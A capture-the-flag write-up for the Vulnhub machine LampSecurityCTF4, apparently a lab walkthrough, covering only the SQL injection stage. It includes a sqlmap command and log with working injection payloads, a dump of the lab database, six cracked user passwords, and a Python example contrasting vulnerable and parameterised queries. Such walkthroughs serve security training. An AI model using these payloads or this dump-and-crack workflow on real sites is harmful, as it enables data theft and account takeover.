Vulnhub machine: LampSecurityCTF4

Administrator
2024-09-11


  • Host discovery

  • nmap port scan

  • Web penetration

  • Manual SQL injection

  • Automated injection with sqlmap

  • Adding SSH parameters

  • Obtaining an initial system shell

  • Privilege escalation, rooted, and summary

  • Tool perspectives [Awesome]

Web pages

After clicking through every page I noticed a few URLs that take a ?page= parameter, so those are worth testing with different values.

http://192.168.100.111/index.html?page=blog&title=Blog

http://192.168.100.111/index.html?page=../../../../../../../../../etc/passwd

I tried it; there is no arbitrary file read vulnerability here.

Click around a few places and watch how the URL changes.

This is a spot where SQL injection can be tried.

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20

This is a MySQL syntax error surfacing through PHP: the query failed, so mysql_fetch_row() on line 20 of blog.php was handed an invalid result resource instead of a result set.

That confirms a SQL injection vulnerability exists here.
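An added example, not code from the writeup or from the CTF image, reconstructing why that warning appears and what the fix looks like. The blog.php source is not on the page, so the string-concatenation pattern is an assumption; the table and column names come from the sqlmap dump further down, the sample rows are constructed, and SQLite stands in for MySQL so it runs offline.

```python
"""Vulnerable query construction beside its hardened form.

Assumed pattern (blog.php is not shown on the page): the GET parameter is
pasted straight into the SQL string. With SQLite in place of MySQL the same
three outcomes can be reproduced: a normal lookup, a broken query (what PHP
reported as 'not a valid MySQL result resource'), and the boolean-based
blind check sqlmap later reported as 'id=2 AND 2800=2800'.
"""
import sqlite3

# Constructed rows mirroring the ehks.user column layout from the dump
# (user_id, user_name, user_pass); the hash values are placeholders.
ROWS = [
    (1, "dstevens", "<hash placeholder>"),
    (2, "achen", "<hash placeholder>"),
    (3, "pmoore", "<hash placeholder>"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the ehks database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (user_id INTEGER, user_name TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """Assumed vulnerable pattern: raw_id is interpolated into the SQL text.
    A malformed value raises OperationalError, the SQLite equivalent of the
    failed mysql_query() behind the PHP warning; a crafted value is executed
    as SQL and silently changes what the query returns."""
    sql = f"SELECT user_name FROM user WHERE user_id = {raw_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened form: validate the type first, then bind the value as a
    parameter so the database never parses it as SQL."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT user_name FROM user WHERE user_id = ?"
    return [row[0] for row in conn.execute(sql, (int(raw_id),))]


def run_query(conn: sqlite3.Connection, fn, raw_id: str) -> tuple:
    """Return ('rows', [...]) on success or ('error', exception name)."""
    try:
        return ("rows", fn(conn, raw_id))
    except (sqlite3.OperationalError, ValueError) as exc:
        return ("error", type(exc).__name__)


def compare(raw_id: str) -> dict:
    """Run one id value through both builders and report both outcomes."""
    conn = make_db()
    try:
        return {
            "vulnerable": run_query(conn, lookup_vulnerable, raw_id),
            "fixed": run_query(conn, lookup_fixed, raw_id),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    # "2'" reproduces the broken query; the two AND values reproduce the
    # true/false pair a boolean-based blind check relies on.
    for value in ("2", "2'", "2 AND 2800=2800", "2 AND 2800=2801"):
        print(repr(value), compare(value))
```

The vulnerable builder returns the same row for `2` and `2 AND 2800=2800` and nothing for `2 AND 2800=2801`, which is exactly the difference in page content that sqlmap's boolean-based test detects; the fixed builder rejects all three crafted values before they reach the database.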

We hand the whole thing to sqlmap in one go:

sqlmap -u "http://192.168.100.111/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate


┌──(root㉿kali)-[~/Desktop/LampSecurityCTF4]
└─# sqlmap -u "http://192.168.100.111/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch
        ___
       __H__                                                                                                                   
 ___ ___[']_____ ___ ___  {1.8.5#stable}                                                                                       
|_ -| . ["]     | .'| . |                                                                                                      
|___|_  [)]_|_|_|__,|  _|                                                                                                      
      |_|V...       |_|   https://sqlmap.org                                                                                   

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:53:20 /2024-09-11/

[04:53:20] [INFO] testing connection to the target URL
[04:53:20] [INFO] testing if the target URL content is stable
[04:53:21] [INFO] target URL content is stable
[04:53:21] [INFO] testing if GET parameter 'page' is dynamic
[04:53:21] [INFO] GET parameter 'page' appears to be dynamic
[04:53:21] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[04:53:21] [INFO] testing for SQL injection on GET parameter 'page'
[04:53:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:53:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[04:53:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[04:53:21] [INFO] testing 'Generic inline queries'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[04:53:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[04:53:21] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[04:53:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:53:21] [WARNING] GET parameter 'page' does not seem to be injectable
[04:53:21] [INFO] testing if GET parameter 'title' is dynamic
[04:53:21] [WARNING] GET parameter 'title' does not appear to be dynamic
[04:53:21] [WARNING] heuristic (basic) test shows that GET parameter 'title' might not be injectable
[04:53:21] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[04:53:21] [INFO] testing for SQL injection on GET parameter 'title'
[04:53:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:53:21] [WARNING] reflective value(s) found and filtering out
[04:53:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[04:53:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[04:53:21] [INFO] testing 'Generic inline queries'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[04:53:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[04:53:21] [INFO] testing 'Oracle AND time-based blind'
[04:53:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:53:21] [WARNING] GET parameter 'title' does not seem to be injectable
[04:53:21] [INFO] testing if GET parameter 'id' is dynamic
[04:53:21] [INFO] GET parameter 'id' appears to be dynamic
[04:53:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[04:53:21] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[04:53:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:53:21] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Ut")
[04:53:21] [INFO] testing 'Generic inline queries'
[04:53:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:53:21] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[04:53:21] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[04:53:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:53:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:53:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:53:21] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:53:21] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[04:53:21] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:53:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL inline queries'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[04:53:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[04:53:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:53:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[04:53:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:53:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:53:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[04:53:31] [INFO] target URL appears to have 5 columns in query
[04:53:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 202 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=blog&title=Blog&id=2 AND 2800=2800

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=blog&title=Blog&id=2 AND (SELECT 4142 FROM (SELECT(SLEEP(5)))ZAWi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162627a71,0x586c7a67504d7a664a46756a6a4c4558636c4a705a797a4b435378537375444e744f746979626244,0x71627a7071)-- -
---
[04:53:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: PHP 5.1.2, Apache 2.2.0
back-end DBMS: MySQL >= 5.0.12
[04:53:31] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test

[04:53:32] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[04:53:32] [INFO] fetching current database
[04:53:32] [INFO] fetching tables for database: 'ehks'
[04:53:32] [INFO] fetching columns for table 'user' in database 'ehks'
[04:53:32] [INFO] fetching entries for table 'user' in database 'ehks'
[04:53:32] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[04:53:32] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:53:32] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[04:53:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:53:32] [INFO] starting 4 processes 
[04:53:32] [INFO] cracked password 'Homesite' for user 'pmoore'                                                               
[04:53:32] [INFO] cracked password 'Sue1978' for user 'jdurbin'                                                               
[04:53:33] [INFO] cracked password 'ilike2surf' for user 'dstevens'                                                           
[04:53:34] [INFO] cracked password 'seventysixers' for user 'achen'                                                           
[04:53:34] [INFO] cracked password 'pacman' for user 'sorzek'                                                                 
[04:53:35] [INFO] cracked password 'undone1' for user 'ghighland'                                                             
Database: ehks                                                                                                                
Table: user
[6 entries]
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+

[04:53:36] [INFO] table 'ehks.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.111/dump/ehks/user.csv'
[04:53:36] [INFO] fetching columns for table 'comment' in database 'ehks'
[04:53:36] [INFO] fetching entries for table 'comment' in database 'ehks'
[04:53:36] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[04:53:36] [INFO] fetching number of entries for table 'comment' in database 'ehks'
[04:53:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:53:36] [INFO] retrieved: 0
[04:53:36] [WARNING] table 'comment' in database 'ehks' appears to be empty
Database: ehks
Table: comment
[0 entries]
+------------+-------------+--------------+--------------+---------------+----------------+
| comment_id | comment_url | comment_body | comment_date | comment_title | comment_author |
+------------+-------------+--------------+--------------+---------------+----------------+
+------------+-------------+--------------+--------------+---------------+----------------+

[04:53:36] [INFO] table 'ehks.`comment`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.111/dump/ehks/comment.csv'                                                                                                                          
[04:53:36] [INFO] fetching columns for table 'blog' in database 'ehks'
[04:53:36] [INFO] fetching entries for table 'blog' in database 'ehks'
Database: ehks
Table: blog
[4 entries]
+---------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+----------------------------------------------+
| blog_id | user_id | blog_body                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                       | blog_date           | blog_title                                   |
+---------+---------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+----------------------------------------------+
| 2       | 4       | Etiam auctor, massa quis viverra vulputate, dolor felis consectetur lectus, at ultrices tortor mauris consequat justo. Duis hendrerit magna in justo. Sed a massa. Sed fermentum. Nunc lacus sem, eleifend non, hendrerit nec, sollicitudin in, odio. Nulla facilisi. Cras mi nibh, egestas ut, tincidunt id, sagittis a, enim. Maecenas non ligula vitae nibh faucibus laoreet. Praesent ipsum lectus, congue eget, tempus vel, dictum at, nisl. Ut tristique enim in justo. Aliquam at sapien. Aliquam erat volutpat. In gravida magna. Pellentesque orci nunc, sodales eu, luctus eget, porta nec, libero. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nulla facilisi. Quisque a nisl sit amet risus fringilla commodo. Aenean tellus. Praesent luctus diam quis mi.\r\n\r\nMaecenas vel justo sed augue gravida sagittis. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin non est. Integer pharetra placerat est. Ut aliquam lectus quis metus. Donec sollicitudin ligula ut sem. Integer dui tellus, pellentesque in, molestie ut, rhoncus nec, odio. Nullam a diam. Proin laoreet libero sed ipsum. Aliquam lectus. Sed venenatis enim in libero. Sed vel libero sit amet sapien placerat rutrum. Nam porta mauris quis mauris. Donec rutrum quam a magna. In non ante. Integer placerat. Praesent aliquet, velit ac feugiat fermentum, diam neque aliquet diam, nec pellentesque turpis nisi eu quam. Aenean suscipit magna non felis commodo malesuada. Praesent dictum pretium velit. Donec ante ipsum, semper ut, ultrices at, fringilla nec, magna.                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                       | 2009-03-09 09:53:15 | Praesent aliquet, velit ac feugiat fermentum |
| 5       | 4       | Curabitur neque. Aenean laoreet. Vestibulum mollis ligula ut quam. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Cras ut lacus. Sed mauris lectus, adipiscing vel, semper ut, dignissim id, ipsum. Nunc semper, libero sit amet sodales dictum, massa metus dapibus neque, eu placerat erat lacus in augue. Maecenas dignissim molestie quam. Nunc ut nulla. Curabitur ullamcorper gravida tortor.\r\n\r\nIn tellus neque, semper eget, eleifend sit amet, aliquam vel, mi. Maecenas rhoncus eros ut risus. Maecenas hendrerit massa sed nisl. Sed placerat, neque quis aliquet condimentum, neque nibh luctus justo, vitae congue sem mi in dui. Cras porttitor. Nullam eu ante id augue aliquet dictum. Suspendisse non magna fermentum sapien mollis mollis. Morbi facilisis, turpis non blandit lobortis, est nunc condimentum lorem, et vulputate felis velit sit amet sapien. Vestibulum in metus. Vivamus rhoncus purus nec lacus. Curabitur sem dui, ullamcorper quis, varius non, blandit id, mi. Pellentesque rutrum. Donec massa augue, tincidunt eget, interdum nec, luctus non, risus. Sed in dolor in velit viverra gravida.\r\n\r\nEtiam facilisis mollis tortor. Sed id arcu. Nullam ornare pellentesque odio. Integer orci orci, viverra et, tincidunt eu, semper vitae, velit. Morbi tristique pharetra justo. Vestibulum eu mi in nunc euismod pellentesque. Morbi ligula augue, malesuada quis, consectetur non, pharetra non, dui. Vestibulum suscipit nibh vel dui. Nullam tempus odio vitae tortor gravida feugiat. In non libero sed est blandit malesuada. Proin a nibh. Integer tempor, nisl vel laoreet consectetur, leo nisl auctor leo, id feugiat massa mauris eget neque.\r\n\r\nInteger enim purus, auctor non, convallis in, viverra ut, arcu. Sed ut metus viverra est molestie tempus. Quisque nunc eros, eleifend id, commodo et, ultrices congue, ante. Sed auctor sapien eget diam. 
Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Fusce ut risus. Pellentesque sit amet ligula nec nisi blandit ultrices. Aenean sem sapien, tempor ac, molestie ut, mattis eu, magna. Vivamus velit. In non lorem. Curabitur eget magna at quam iaculis porttitor. Ut sed velit. Quisque luctus justo eu lectus. Duis sit amet erat a tortor tincidunt pulvinar.  | 2009-03-09 10:04:45 | Vivamus Velit                                |
| 6       | 4       | Suspendisse eget nisl. Nulla facilisi. Aenean turpis sapien, euismod in, molestie in, suscipit eget, diam. Suspendisse lorem elit, bibendum vel, imperdiet quis, facilisis vel, lectus. Maecenas convallis. Maecenas lacinia ligula eget libero. Fusce neque nibh, ornare sodales, porttitor ut, blandit nec, risus. Quisque neque sapien, ultrices ac, elementum ut, dignissim eget, nunc. Nunc nulla purus, fringilla ac, placerat eget, commodo ac, tellus. Ut velit. Morbi eget sem quis neque fringilla cursus. Morbi sit amet magna in lorem mollis porta. Ut euismod. Nam sapien nunc, blandit id, vestibulum ac, tempus quis, metus. Aliquam non enim. Cras feugiat nunc et turpis. Aenean dignissim mauris eget ante. Nulla felis. Cras vestibulum, magna nec porttitor porttitor, tortor mi congue nibh, eget porttitor neque lectus quis ligula.\r\n\r\nSuspendisse potenti. Mauris at nisi ac sem consequat laoreet. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Sed mi sem, tempus ut, consequat fringilla, ornare eu, nulla. Vestibulum quis erat in metus rutrum placerat. Maecenas accumsan imperdiet ante. Curabitur consequat lorem suscipit leo. Aliquam erat volutpat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi placerat nibh sit amet nibh. Maecenas ultricies, nibh accumsan aliquam volutpat, orci velit varius nunc, ac ultricies ligula dui et lectus. Sed tempus consequat quam. Aenean convallis sapien in sem.\r\n\r\nNulla purus. Aenean enim. Vivamus mattis pellentesque velit. Aenean est nibh, aliquet id, scelerisque ac, rutrum quis, lorem. Integer tincidunt risus a mauris. In hac habitasse platea dictumst. Ut et arcu. Phasellus leo justo, sagittis nec, ullamcorper a, porta id, dui. Aliquam at magna. Pellentesque justo. Nullam facilisis. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris ultrices elit non leo. 
Donec nunc dui, posuere quis, dignissim quis, tincidunt vitae, lacus.                                                                                                                                                                                                                                                                                | 2009-03-09 10:05:05 | Aliquam Erat Volutpat                        |
| 7       | 5       | Vestibulum convallis. Quisque aliquet, sem eu tempor vehicula, augue mi semper tortor, ut rutrum metus mi et felis. Vestibulum consequat, augue sed ultrices rutrum, neque velit luctus arcu, vel condimentum sapien turpis at eros. Duis at orci vel est aliquet consequat. Fusce vitae lorem. Pellentesque non urna tincidunt libero tempus hendrerit. Donec consequat quam ac velit. Sed quis ante. Sed iaculis metus ac eros pharetra venenatis. Sed nec dolor. Ut tristique.\r\n\r\nSed quis lectus. Maecenas lacinia nisl eu sem. Curabitur id ante non orci tincidunt malesuada. Phasellus et urna. Nunc id nibh at tellus consequat accumsan. Aenean massa. Donec non est. Nunc leo. Vestibulum vulputate magna in diam. Duis vulputate elit dictum dolor. Sed purus nulla, condimentum et, posuere id, ultricies eget, risus. Aliquam erat volutpat. In blandit orci imperdiet ligula. Ut ut velit. Nullam tincidunt. Nunc aliquet tempus lorem.\r\n\r\nNam velit. In augue nibh, mollis sit amet, aliquet dapibus, lobortis eget, leo. Nullam risus augue, iaculis a, ullamcorper vitae, suscipit gravida, lorem. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Nunc lacinia tellus nec orci. Proin purus. Duis suscipit. Nullam eu dui. Suspendisse rutrum mollis arcu. Pellentesque nisi. Integer arcu ipsum, venenatis eget, scelerisque sed, adipiscing eget, diam. Vivamus tristique metus vel erat. Nulla iaculis. Ut ut neque vel odio consequat gravida. Suspendisse potenti.\r\n\r\nSed at ipsum ut lectus bibendum hendrerit. Etiam dignissim dui eu lectus. Etiam tristique enim et massa. Nunc tempor pellentesque sem. Aenean egestas metus in dolor. Phasellus auctor metus non dui. Phasellus eu mi. Suspendisse sed nibh. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Maecenas diam dolor, posuere porttitor, lobortis a, dignissim ut, ante. Etiam placerat. Proin id justo vel elit aliquam laoreet. 
Praesent sapien urna, lacinia id, dictum vel, ornare sit amet, lorem. In ac urna. Sed congue nisl ut ipsum. Donec vitae tortor. Nulla facilisi. Suspendisse id lacus. Sed consequat lacinia nisi.                                                                                                                                                     | 2009-03-09 10:06:26 | Justo Vel Elit Aliquam                       |
+---------+---------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+----------------------------------------------+

[04:53:36] [INFO] table 'ehks.blog' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.111/dump/ehks/blog.csv'
[04:53:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.111'

[*] ending @ 04:53:36 /2024-09-11/

Database: ehks                                                                                                                
Table: user
[6 entries]
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
